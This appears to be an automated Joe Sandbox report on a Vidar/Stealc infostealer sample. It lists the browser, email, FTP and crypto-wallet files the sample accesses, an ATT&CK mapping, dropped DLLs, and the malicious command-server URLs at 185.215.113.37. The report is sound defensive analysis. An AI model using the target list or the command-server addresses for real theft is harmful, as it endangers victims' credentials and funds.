Source: Yara match	File source: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7344, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7344, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: \Electrum-LTC\wallets\
Source: file.exe	String found in binary or memory: \ElectronCash\wallets\
Source: file.exe	String found in binary or memory: \Electrum\wallets\
Source: file.exe	String found in binary or memory: window-state.json
Source: file.exe	String found in binary or memory: Jaxx Desktop
Source: file.exe	String found in binary or memory: exodus.conf.json
Source: file.exe	String found in binary or memory: \Exodus\
Source: file.exe	String found in binary or memory: info.seco
Source: file.exe	String found in binary or memory: ElectrumLTC
Source: file.exe	String found in binary or memory: passphrase.json
Source: file.exe	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: \Exodus\
Source: file.exe, 00000000.00000002.1991553244.0000000001419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.json
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: file__0.localstorage
Source: file.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe	String found in binary or memory: multidoge.wallet
Source: file.exe	String found in binary or memory: seed.seco
Source: file.exe	String found in binary or memory: keystore
Source: file.exe	String found in binary or memory: \Electrum-LTC\wallets\
Source: file.exe, 00000000.00000002.1991553244.00000000013C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\.*

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 7344, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1717801615.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1991553244.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7344, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7344, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	335 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	641 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	42%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	URL Reputation	safe
http://185.215.113.37/e2b1563c6670f193.phpBR	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpc=0f	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpnfigOverlay	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/nss3.dll	100%	Avira URL Cloud	malware
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://185.215.113.37DJ	0%	Avira URL Cloud	safe
http://185.215.113.37/	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/nss3.dllu	100%	Avira URL Cloud	malware
http://185.215.113.37	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/sqlite3.dll:	100%	Avira URL Cloud	malware
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/mozglue.dll	100%	Avira URL Cloud	malware
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://185.215.113.37e2b1563c6670f193.phption:	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpCoinomi	100%	Avira URL Cloud	malware
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpq	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/softokn3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phps	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpser	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/freebl3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phption:	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpi	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php	100%	Avira URL Cloud	malware
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	0%	Avira URL Cloud	safe
http://www.mozilla.com/en-US/blocklist/	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpf	100%	Avira URL Cloud	malware
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpY	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpU1R	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpic	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpB	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/msvcp140.dll9	100%	Avira URL Cloud	malware
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/sqlite3.dllg	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpus.wallet	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php1	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpH	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpogZf	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpER	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/nss3.dllb	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpesSf	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	BKECBAKF.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	CAKKJKKECFIDGDHIJEGDAKFBFB.0.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	BKECBAKF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpc=0f	file.exe, 00000000.00000002.1991553244.0000000001330000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpnfigOverlay	file.exe, 00000000.00000002.1991553244.0000000001397000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dllu	file.exe, 00000000.00000002.1991553244.0000000001384000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpBR	file.exe, 00000000.00000002.1991553244.0000000001330000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	file.exe, 00000000.00000002.1991553244.0000000001419000.00000004.00000020.00020000.00000000.sdmp, EGHCAKKEGCAAFHJJJDBK.0.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	BKECBAKF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37DJ	file.exe, 00000000.00000002.1991553244.000000000133E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://185.215.113.37	file.exe, 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1991553244.000000000133E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	file.exe, 00000000.00000003.1789346818.000000001D4BC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll:	file.exe, 00000000.00000002.1991553244.000000000133E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpCoinomi	file.exe, 00000000.00000002.1991553244.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpq	file.exe, 00000000.00000002.1991553244.0000000001384000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	EGHCAKKEGCAAFHJJJDBK.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phps	file.exe, 00000000.00000002.1991553244.0000000001330000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	BKECBAKF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpser	file.exe, 00000000.00000002.1991553244.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpf	file.exe, 00000000.00000002.1991553244.0000000001330000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	file.exe, 00000000.00000002.1991553244.0000000001419000.00000004.00000020.00020000.00000000.sdmp, EGHCAKKEGCAAFHJJJDBK.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpi	file.exe, 00000000.00000002.1991553244.0000000001384000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.2014495599.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2003678087.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, 00000000.00000002.2014899575.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false	Avira URL Cloud: safe	unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	file.exe, 00000000.00000002.1991553244.0000000001419000.00000004.00000020.00020000.00000000.sdmp, EGHCAKKEGCAAFHJJJDBK.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	BKECBAKF.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpU1R	file.exe, 00000000.00000002.1991553244.0000000001384000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpY	file.exe, 00000000.00000002.1991553244.0000000001384000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpic	file.exe, 00000000.00000002.1991553244.0000000001330000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BKECBAKF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dllg	file.exe, 00000000.00000002.1991553244.00000000013C0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	file.exe, 00000000.00000002.1991553244.0000000001419000.00000004.00000020.00020000.00000000.sdmp, EGHCAKKEGCAAFHJJJDBK.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll9	file.exe, 00000000.00000002.1991553244.00000000013C0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpB	file.exe, 00000000.00000002.1991553244.0000000001330000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpus.wallet	file.exe, 00000000.00000002.1991553244.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	file.exe, 00000000.00000003.1789346818.000000001D4BC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	BKECBAKF.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	CAKKJKKECFIDGDHIJEGDAKFBFB.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpH	file.exe, 00000000.00000002.1991553244.0000000001330000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	BKECBAKF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php1	file.exe, 00000000.00000002.1991553244.0000000001384000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.1991553244.0000000001419000.00000004.00000020.00020000.00000000.sdmp, EGHCAKKEGCAAFHJJJDBK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpogZf	file.exe, 00000000.00000002.1991553244.0000000001330000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpER	file.exe, 00000000.00000002.1991553244.0000000001330000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpesSf	file.exe, 00000000.00000002.1991553244.0000000001330000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://support.mozilla.org	CAKKJKKECFIDGDHIJEGDAKFBFB.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dllb	file.exe, 00000000.00000002.1991553244.0000000001384000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	BKECBAKF.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519736
Start date and time:	2024-09-26 22:39:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
